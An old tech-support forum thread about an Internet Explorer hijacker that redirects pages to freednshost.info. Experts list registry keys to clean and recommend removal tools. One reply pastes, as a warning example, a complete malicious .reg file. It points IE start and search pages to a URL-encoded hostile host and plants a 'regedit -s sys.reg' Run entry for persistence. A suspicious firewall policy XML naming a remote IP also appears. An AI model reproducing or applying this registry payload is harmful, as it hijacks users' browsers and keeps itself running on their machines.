datinfo
asked on
Unknown virus or malicious file
I have a serious problem. I believe I've been infected by something that seems to act like adware, like a virus and a cookie at the same time. It makes my Internet Explorer run unproperly. What it does is that it sets my web homepage as freednshost.info and every time I change it to another webpage as soon as I close the program and open it again its back to freednshost.info. Also every time I click a link on any Internet webpage it will send me to that same page, freednshost.info and I get some sort of search engine with an irritating little stick man dancing up and down on the page. This virus also puts unsolocited Internet Explorer shortcuts on my active desktop and it shows mortgage ads on my options menu in Internet Explorer.
I've tried everything. I've scanned my computer. Looked for the infected file manually and I've downloaded the latest virus definitions for my Norton Antivirus but it doesn't seem to help.
What do I do?
I've tried everything. I've scanned my computer. Looked for the infected file manually and I've downloaded the latest virus definitions for my Norton Antivirus but it doesn't seem to help.
What do I do?
Check these registry entries
HKEY_CURRENT_USER\Software \Microsoft \Internet Explorer\Main\Search Bar
HKEY_CURRENT_USER\Software \Microsoft \Internet Explorer\Main\Search Page
HKEY_CURRENT_USER\Software \Microsoft \Internet Explorer\Main\Start Page
HKCU\Software\Microsoft\In ternet Explorer\SearchURL
HKCU\Software\Microsoft\In ternet Explorer\Main\Default_Page _URL
HKCU\Software\Microsoft\In ternet Explorer\Main\Default_Sear ch_URL
HKCU\Software\Microsoft\In ternet Explorer\Search\SearchAssi stant
HKCU\Software\Microsoft\In ternet Explorer\Search\CustomizeS earch
HKEY_LOCAL_MACHINE\Softwar e\Microsof t\Internet Explorer\Main\Search Bar
and remove freednshost.info .. before doing that backup your registry
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\Software
HKCU\Software\Microsoft\In
HKCU\Software\Microsoft\In
HKCU\Software\Microsoft\In
HKCU\Software\Microsoft\In
HKCU\Software\Microsoft\In
HKEY_LOCAL_MACHINE\Softwar
and remove freednshost.info .. before doing that backup your registry
ASKER
Thanks! That was really fast! I just posted the question! I honestly didn't expect such a fast answer!
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
datinfo,
> I honestly didn't expect such a fast answer!
You will be surprised every time you post .. Ofcourse i should be online. LOL !!
> I honestly didn't expect such a fast answer!
You will be surprised every time you post .. Ofcourse i should be online. LOL !!
Thanks for the super fast feedback
Whoops,
You forgot the most important key of the all: The "RUN" keys.
(RUN/RUNONCE). - In particular:
HKEY_CURRENT_USER\Software \Microsoft \Windows\C urrentvers ion\Run
If this has a value e.g.
sys REG_SZ "regedit -s sys.reg"
Delete this - and any other line that does not belong to anything you want to start.
Search the %WINDIR% directory for files recently updated- same with e.g. WINNT\system32. The last files updated should only be the Perfomance log files.
Your "sys.reg" is downloaded from a site that I am trying to find - the problem is that it first installs itself as a IE "Cookie" in the temporary Internet files - and then after a while it is move. I had the following installed on February 26 - to wake up on April 17 at 19:40 - and slip through all virus scanners:
REGEDIT4
[HKEY_CURRENT_USER\Softwar e\Microsof t\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Softwar e\Microsof t\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Softwa re\Microso ft\Interne t Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Softwa re\Microso ft\Interne t Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Softwar e\Microsof t\Windows\ CurrentVer sion\Inter net Settings]
"PrivacyAdvanced"=dword:00 000001
[HKEY_LOCAL_MACHINE\Softwa re\Microso ft\Windows \CurrentVe rsion\Run]
"sys"="regedit -s sys.reg"
----------------
That is one. The other is
<?xml version="1.0"?>
<securitypolicy version="1">
<fwdebuglog debugflags="0x00000000" maxdebuglog="0"/>
<lockupinfo server="208.185.174.60" port="0" enable="true"/>
<startuphookafd wsockvermajor="0x00050000" wsockverminor="0x089319cb" enable="true"/>
<processes>
<process name="fssm32.exe" openprocessaction="allow">
<md5table>
<md5hex>91feb4e9-8cf1e8e5- 4f6f306a-e 1399374</m d5hex>
<md5hex>2f856f29-4d155a8c- c4ebb124-3 bfeb9d4</m d5hex>
<md5hex>6ea475f6-d34c3c6d- 7a8a6845-a 525d6e6</m d5hex>
</md5table>
</process>
</processes>
</securitypolicy>
...
- but where the ip address is a dead give-away: here ZoneLabs to fetch an executable.
Use Security Policy to avoid change of the RUN keys - some tools like PortPro will guard the keys and notify before they are changed. The WEB pages are malicious - and most believe that virus spread with mail attachment.
I have in another response recommended that all file names in "system32" be changed with e.g. 1st and 4th letter uppercase - rest lowercase. You make some convention that allows you to see in Taskman when an intrusion has been made - e.g. the fssm32.exe above would not be FssM32.exe - so KILL IT.
Make your own search page - distribute this - or force everyone to Google - then "Brand" IE - that inhibits all users to change searchpage, homepage and security settings.
You forgot the most important key of the all: The "RUN" keys.
(RUN/RUNONCE). - In particular:
HKEY_CURRENT_USER\Software
If this has a value e.g.
sys REG_SZ "regedit -s sys.reg"
Delete this - and any other line that does not belong to anything you want to start.
Search the %WINDIR% directory for files recently updated- same with e.g. WINNT\system32. The last files updated should only be the Perfomance log files.
Your "sys.reg" is downloaded from a site that I am trying to find - the problem is that it first installs itself as a IE "Cookie" in the temporary Internet files - and then after a while it is move. I had the following installed on February 26 - to wake up on April 17 at 19:40 - and slip through all virus scanners:
REGEDIT4
[HKEY_CURRENT_USER\Softwar
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Softwar
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Softwa
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Softwa
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Softwar
"PrivacyAdvanced"=dword:00
[HKEY_LOCAL_MACHINE\Softwa
"sys"="regedit -s sys.reg"
----------------
That is one. The other is
<?xml version="1.0"?>
<securitypolicy version="1">
<fwdebuglog debugflags="0x00000000" maxdebuglog="0"/>
<lockupinfo server="208.185.174.60" port="0" enable="true"/>
<startuphookafd wsockvermajor="0x00050000"
<processes>
<process name="fssm32.exe" openprocessaction="allow">
<md5table>
<md5hex>91feb4e9-8cf1e8e5-
<md5hex>2f856f29-4d155a8c-
<md5hex>6ea475f6-d34c3c6d-
</md5table>
</process>
</processes>
</securitypolicy>
...
- but where the ip address is a dead give-away: here ZoneLabs to fetch an executable.
Use Security Policy to avoid change of the RUN keys - some tools like PortPro will guard the keys and notify before they are changed. The WEB pages are malicious - and most believe that virus spread with mail attachment.
I have in another response recommended that all file names in "system32" be changed with e.g. 1st and 4th letter uppercase - rest lowercase. You make some convention that allows you to see in Taskman when an intrusion has been made - e.g. the fssm32.exe above would not be FssM32.exe - so KILL IT.
Make your own search page - distribute this - or force everyone to Google - then "Brand" IE - that inhibits all users to change searchpage, homepage and security settings.
I know I posted a virus.
But I believe in educating by real examples, not just mumble jumble talking.
Please beware - it is a virus that will set IE to search somewhere else.
But I believe in educating by real examples, not just mumble jumble talking.
Please beware - it is a virus that will set IE to search somewhere else.
IP address resolution:
See http://www.geektools.com/whois.php
It is good because it links in with the regional whois databases.
Another tool is the ID server found at www.grc.com - Steve Gibson's page.
See http://www.geektools.com/whois.php
It is good because it links in with the regional whois databases.
Another tool is the ID server found at www.grc.com - Steve Gibson's page.
i am not able to delete the vsconfig.xml . It says process is being used by another process. I restored my registry, how can i get rid of this vsconfig.xml ?
Rename to e.g. vsconfig.xml.vir - designate open/edit of .vir to Notepad.
Delete *.vir next time you have rebooted the system.
This also allows you to rename files that you do not trust - and inhibit these from being loaded at boot-up. You can now inspect with suited tools - and if the file is e.g. part of MS administrative tools, then you just rename the file - back to vsconfig.xml...
Delete *.vir next time you have rebooted the system.
This also allows you to rename files that you do not trust - and inhibit these from being loaded at boot-up. You can now inspect with suited tools - and if the file is e.g. part of MS administrative tools, then you just rename the file - back to vsconfig.xml...
Identify the files you have verified with a combination of uppercase/lowercase names.
E.g. to VscOnfig.xml - described in another posting - here first and fourth char in upper case.
E.g. to VscOnfig.xml - described in another posting - here first and fourth char in upper case.
After installing them, First Update them and then run
Spyware/Adware removal tools:
--------------------------
What is spyware : http://www.spychecker.com/spyware.html
SpyBot-S&D : http://www.safer-networking.org/
Ad-aware : http://www.webattack.com/download/dladaware.shtml
CWShredder: http://www.softpedia.com/public/cat/10/17/10-17-150.shtml
HijackThis : http://www.spychecker.com/program/hijackthis.html